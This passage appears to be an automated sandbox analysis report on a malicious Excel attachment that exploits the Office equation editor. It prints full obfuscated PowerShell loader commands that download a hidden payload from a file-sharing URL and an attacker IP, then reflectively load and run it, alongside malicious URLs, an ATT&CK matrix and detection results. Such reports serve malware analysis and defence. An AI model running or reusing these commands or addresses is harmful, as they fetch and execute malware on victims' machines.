bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdkzjvpbwfnzvvybca9iddaywh0dhbzoi8vmzewns5mawwnkydlbwfpbc5jb20vyscrj3bpl2zpbguvz2v0p2zpbgvrzxk9c2huuehiq1byog8tbe8nkyd0q3fitec2xzb4q3ktegw0dg54befwyle5jysnns1kdmluszvjqvjhtmrramjim21legz3uxplbvryzyzza2lwcmvnpxrydwumcgtfdmlkpwuwmta5njm4yzlizmi5ntcxnzmyntmxmza5yjvmzjdjiddayttkzjv3zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxqnkycuv2viq2xpzw50oycrj0pmnwltyscrj2dlqnl0zxmgpsbkzjv3zwjdbgllbnqurg93bmxvywreyxrhkepmnwltywdlvxjskttkzjvpbwfnzvrlehqgpsbbu3lzdgvtllrleccrj3qurw5jb2rpbmddojpvvey4lkdldfn0cmluzyhkzjvpbwfnzuj5dccrj2vzkttkzjvzdgfydezsywcgpsa3wme8pejbu0u2nf9tvefsvd4nkyc+n1pho0pmnwvuzezsywcgjysnpsa3wme8pejbu0u2nf9ftkq+pjdayttkzjvzdgfydeluzgv4id0gsmy1aw1hz2vuzxh0jysnlkluzgv4t2yosmy1c3rhcnrgbgfnkttkzjvlbmrjbmrleca9iepmnwltywdlvgv4dc5jbmrlee9mkeonkydmnwvuzezsywcpo0pmnxn0yxj0sw5kzxgglwdlidaglwfuzcbkzjvlbmrjbmqnkydlecatz3qgsmy1c3rhcnrjbmrledtkzjvzdgfydeluzgv4ics9iepmnxn0yxj0rmxhzy5mzw5ndccrj2g7smy1ymfzzty0tgvuz3roid0gsmynkyc1zw5ksw5kzxgglsbkzjunkydzdgfydeluzccrj2v4o0pmnwjhc2u2nenvbw1hbmqgpscrjybkzjunkydpbwfnzvrlehquu3vic3ryaw5nkepmnxn0yxj0sw5kzxgsiepmnwjhjysnc2u2nexlbmd0ack7smy1ymfzztynkyc0umv2zxjzzwqgpsataicrj29pbiaosmy1ymfzztynkyc0q29tbwfuzc5ub0noyxjbcnjhesgpiffhmcbgb3jfywnolu9iamvjdccrjyb7iepmnv8gfslblteuli0osmy1jysnymfzjysnzty0q29tbwfuzc5mzw5ndggpxttkzjvjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkepmnwjhc2u2nfjldmvyc2vkkttkzjvsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsescrj106okxvywqosmy1y29tbwfuzej5dgvzkttkzjv2ywlnzxrob2qnkycgpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkddayvzbstdaysk7smy1dmfptwv0ag9klkludm9rzshkzjvudwxslcbakddayxr4dc5svendq1jwlzyymi81mtiuodixlju5ljmyly86cccrj3r0addayswgn1phzgvzyxrpdmfkbzdayswgn1phzgvzyxqnkydpdmfkbzdayswgn1phzgvzyxrpdicrj2fkbzdayswgn1phyxmnkydwbmunkyd0x2nvbxbpbgvyn1phlca3wmfkzxnhdgl2ywrvn1phlca3wmfkzxnhdgl2ywrvn1phlddajysnywrlc2f0axzhzccrj283wmesn1phjysnzgvzyxqnkydpdmfkbzdaysw3wmfkzxnhjysndgl2ywrvn1phlddaywrlc2f0axzhzg83wmesn1phzgvzyxrpdmenkydkbzdaysw3wmexn1phlddaywrlc2f0axzhzg83wmepktsnks5srvbsqwnlkcdkzjunlfttdhjptkddw0noqvjdmzyplljfugxby2uojzdayscsw1n0cmlor11bq2hbul0zoskuukvqbefjzsgow0noqvjdoderw0noqvjdnzerw0noqvjdndgplfttdhjptkddw0noqvjdmti0ksb8ic4oicrwc2hpbuvbmjfdkyrwu0hpbwvbmzbdkyd4jyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('jf5imageurl = 7zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shtphbcpx8o-lo'+'tcqhlg6_0xcy-xl4tnxlavbq9'+'5-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7za;jf5webclient = new-object system.net'+'.webclient;'+'jf5ima'+'gebytes = jf5webclient.downloaddata(jf5imageurl);jf5imagetext = [system.tex'+'t.encoding]::utf8.getstring(jf5imagebyt'+'es);jf5startflag = 7za<<base64_start>'+'>7za;jf5endflag '+'= 7za<<base64_end>>7za;jf5startindex = jf5imagetext'+'.indexof(jf5startflag);jf5endindex = jf5imagetext.indexof(j'+'f5endflag);jf5startindex -ge 0 -and jf5endind'+'ex -gt jf5startindex;jf5startindex += jf5startflag.lengt'+'h;jf5base64length = jf'+'5endindex - jf5'+'startind'+'ex;jf5base64command ='+' jf5'+'imagetext.substring(jf5startindex, jf5ba'+'se64length);jf5base6'+'4reversed = -j'+'oin (jf5base6'+'4command.tochararray() qg0 foreach-object'+' { jf5_ })[-1..-(jf5'+'bas'+'e64command.length)];jf5commandbytes = [system.convert]::frombase64string(jf5base64reversed);jf5loadedassembly = [system.reflection.assembly'+']::load(jf5commandbytes);jf5vaimethod'+' = [dnlib.io.home].getmethod(7zavai7za);jf5vaimethod.invoke(jf5null, @(7zatxt.rtcccrv/622/512.821.59.32//:p'+'tth7za, 7zadesativado7za, 7zadesat'+'ivado7za, 7zadesativ'+'ado7za, 7zaas'+'pne'+'t_compiler7za, 7zadesativado7za, 7zadesativado7za,7z'+'adesativad'+'o7za,7za'+'desat'+'ivado7za,7zadesa'+'tivado7za,7zadesativado7za,7zadesativa'+'do7za,7za17za,7zadesativado7za));').replace('jf5',[string][char]36).replace('7za',[string][char]39).replace(([char]81+[char]71+[char]48),[string][char]124) | .( $pshome[21]+$pshome[30]+'x')"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdkzjvpbwfnzvvybca9iddaywh0dhbzoi8vmzewns5mawwnkydlbwfpbc5jb20vyscrj3bpl2zpbguvz2v0p2zpbgvrzxk9c2huuehiq1byog8tbe8nkyd0q3fitec2xzb4q3ktegw0dg54befwyle5jysnns1kdmluszvjqvjhtmrramjim21legz3uxplbvryzyzza2lwcmvnpxrydwumcgtfdmlkpwuwmta5njm4yzlizmi5ntcxnzmyntmxmza5yjvmzjdjiddayttkzjv3zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxqnkycuv2viq2xpzw50oycrj0pmnwltyscrj2dlqnl0zxmgpsbkzjv3zwjdbgllbnqurg93bmxvywreyxrhkepmnwltywdlvxjskttkzjvpbwfnzvrlehqgpsbbu3lzdgvtllrleccrj3qurw5jb2rpbmddojpvvey4lkdldfn0cmluzyhkzjvpbwfnzuj5dccrj2vzkttkzjvzdgfydezsywcgpsa3wme8pejbu0u2nf9tvefsvd4nkyc+n1pho0pmnwvuzezsywcgjysnpsa3wme8pejbu0u2nf9ftkq+pjdayttkzjvzdgfydeluzgv4id0gsmy1aw1hz2vuzxh0jysnlkluzgv4t2yosmy1c3rhcnrgbgfnkttkzjvlbmrjbmrleca9iepmnwltywdlvgv4dc5jbmrlee9mkeonkydmnwvuzezsywcpo0pmnxn0yxj0sw5kzxgglwdlidaglwfuzcbkzjvlbmrjbmqnkydlecatz3qgsmy1c3rhcnrjbmrledtkzjvzdgfydeluzgv4ics9iepmnxn0yxj0rmxhzy5mzw5ndccrj2g7smy1ymfzzty0tgvuz3roid0gsmynkyc1zw5ksw5kzxgglsbkzjunkydzdgfydeluzccrj2v4o0pmnwjhc2u2nenvbw1hbmqgpscrjybkzjunkydpbwfnzvrlehquu3vic3ryaw5nkepmnxn0yxj0sw5kzxgsiepmnwjhjysnc2u2nexlbmd0ack7smy1ymfzztynkyc0umv2zxjzzwqgpsataicrj29pbiaosmy1ymfzztynkyc0q29tbwfuzc5ub0noyxjbcnjhesgpiffhmcbgb3jfywnolu9iamvjdccrjyb7iepmnv8gfslblteuli0osmy1jysnymfzjysnzty0q29tbwfuzc5mzw5ndggpxttkzjvjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkepmnwjhc2u2nfjldmvyc2vkkttkzjvsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsescrj106okxvywqosmy1y29tbwfuzej5dgvzkttkzjv2ywlnzxrob2qnkycgpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkddayvzbstdaysk7smy1dmfptwv0ag9klkludm9rzshkzjvudwxslcbakddayxr4dc5svendq1jwlzyymi81mtiuodixlju5ljmyly86cccrj3r0addayswgn1phzgvzyxrpdmfkbzdayswgn1phzgvzyxqnkydpdmfkbzdayswgn1phzgvzyxrpdicrj2fkbzdayswgn1phyxmnkydwbmunkyd0x2nvbxbpbgvyn1phlca3wmfkzxnhdgl2ywrvn1phlca3wmfkzxnhdgl2ywrvn1phlddajysnywrlc2f0axzhzccrj283wmesn1phjysnzgvzyxqnkydpdmfkbzdaysw3wmfkzxnhjysndgl2ywrvn1phlddaywrlc2f0axzhzg83wmesn1phzgvzyxrpdmenkydkbzdaysw3wmexn1phlddaywrlc2f0axzhzg83wmepktsnks5srvbsqwnlkcdkzjunlfttdhjptkddw0noqvjdmzyplljfugxby2uojzdayscsw1n0cmlor11bq2hbul0zoskuukvqbefjzsgow0noqvjdoderw0noqvjdnzerw0noqvjdndgplfttdhjptkddw0noqvjdmti0ksb8ic4oicrwc2hpbuvbmjfdkyrwu0hpbwvbmzbdkyd4jyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('jf5imageurl = 7zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shtphbcpx8o-lo'+'tcqhlg6_0xcy-xl4tnxlavbq9'+'5-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7za;jf5webclient = new-object system.net'+'.webclient;'+'jf5ima'+'gebytes = jf5webclient.downloaddata(jf5imageurl);jf5imagetext = [system.tex'+'t.encoding]::utf8.getstring(jf5imagebyt'+'es);jf5startflag = 7za<<base64_start>'+'>7za;jf5endflag '+'= 7za<<base64_end>>7za;jf5startindex = jf5imagetext'+'.indexof(jf5startflag);jf5endindex = jf5imagetext.indexof(j'+'f5endflag);jf5startindex -ge 0 -and jf5endind'+'ex -gt jf5startindex;jf5startindex += jf5startflag.lengt'+'h;jf5base64length = jf'+'5endindex - jf5'+'startind'+'ex;jf5base64command ='+' jf5'+'imagetext.substring(jf5startindex, jf5ba'+'se64length);jf5base6'+'4reversed = -j'+'oin (jf5base6'+'4command.tochararray() qg0 foreach-object'+' { jf5_ })[-1..-(jf5'+'bas'+'e64command.length)];jf5commandbytes = [system.convert]::frombase64string(jf5base64reversed);jf5loadedassembly = [system.reflection.assembly'+']::load(jf5commandbytes);jf5vaimethod'+' = [dnlib.io.home].getmethod(7zavai7za);jf5vaimethod.invoke(jf5null, @(7zatxt.rtcccrv/622/512.821.59.32//:p'+'tth7za, 7zadesativado7za, 7zadesat'+'ivado7za, 7zadesativ'+'ado7za, 7zaas'+'pne'+'t_compiler7za, 7zadesativado7za, 7zadesativado7za,7z'+'adesativad'+'o7za,7za'+'desat'+'ivado7za,7zadesa'+'tivado7za,7zadesativado7za,7zadesativa'+'do7za,7za17za,7zadesativado7za));').replace('jf5',[string][char]36).replace('7za',[string][char]39).replace(([char]81+[char]71+[char]48),[string][char]124) | .( $pshome[21]+$pshome[30]+'x')"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information221
    Scripting    		Valid Accounts121
    Command and Scripting Interpreter    		221
    Scripting    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Process Discovery    		Remote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts43
    Exploitation for Client Execution    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		LSASS Memory21
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media25
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts3
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Application Window Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput Capture14
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Obfuscated Files or Information    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563998 Sample: Pedido No 4500924462.xls Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 41 ljg.cl 2->41 53 Suricata IDS alerts for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for dropped file 2->57 59 17 other signatures 2->59 9 EXCEL.EXE 57 31 2->9         started        signatures3 process4 dnsIp5 43 23.95.128.215, 49166, 49173, 49174 AS-COLOCROSSINGUS United States 9->43 45 ljg.cl 152.231.102.107, 443, 49165, 49167 ENTELCHILESACL Chile 9->45 31 C:\Users\...\Pedido No 4500924462.xls (copy), Composite 9->31 dropped 33 seemybestmagicalth...______bestof[1].doc, Rich 9->33 dropped 13 WINWORD.EXE 348 30 9->13         started        18 wscript.exe 1 9->18         started        file6 process7 dnsIp8 51 ljg.cl 13->51 35 C:\Users\user\AppData\Roaming\...\ljg.cl.url, MS 13->35 dropped 37 ~WRF{498AB1A3-A070...3-2EA9C1DC4C55}.tmp, Composite 13->37 dropped 39 C:\Users\user\AppData\Local\...\B7AFCBA1.doc, Rich 13->39 dropped 69 Microsoft Office launches external ms-search protocol handler (WebDAV) 13->69 71 Office viewer loads remote template 13->71 73 Microsoft Office drops suspicious files 13->73 20 EQNEDT32.EXE 12 13->20         started        75 Suspicious powershell command line found 18->75 77 Wscript starts Powershell (via cmd or directly) 18->77 79 Bypasses PowerShell execution policy 18->79 81 2 other signatures 18->81 24 powershell.exe 4 18->24         started        file9 signatures10 process11 file12 29 seemegivenmebestto...ntirethingsf9rm.vBs, Unicode 20->29 dropped 61 Office equation editor establishes network connection 20->61 63 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 20->63 65 Suspicious powershell command line found 24->65 67 Obfuscated command line found 24->67 26 powershell.exe 12 5 24->26         started        signatures13 process14 dnsIp15 47 ip.3105.filemail.com 193.30.119.205, 443, 49175 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 26->47 49 3105.filemail.com 26->49

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Pedido No 4500924462.xls24%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
    Pedido No 4500924462.xls100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc100%AviraHEUR/Rtf.Malformed
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc100%AviraHEUR/Rtf.Malformed
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{498AB1A3-A070-4AC4-B443-2EA9C1DC4C55}.tmp100%AviraEXP/CVE-2017-11882.Gen

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIFj0%Avira URL Cloudsafe
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF?0%Avira URL Cloudsafe
    https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange0%Avira URL Cloudsafe
    https://3105.fil0%Avira URL Cloudsafe
    https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice0%Avira URL Cloudsafe
    http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc0%Avira URL Cloudsafe
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF0%Avira URL Cloudsafe
    https://ljg.cl/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    ip.3105.filemail.com
    		193.30.119.205
    		truefalse
      		high
      ljg.cl
      		152.231.102.107
      		truefalse
        		high
        3105.filemail.com
        		unknown
        		unknownfalse
          		high

          Contacted URLs

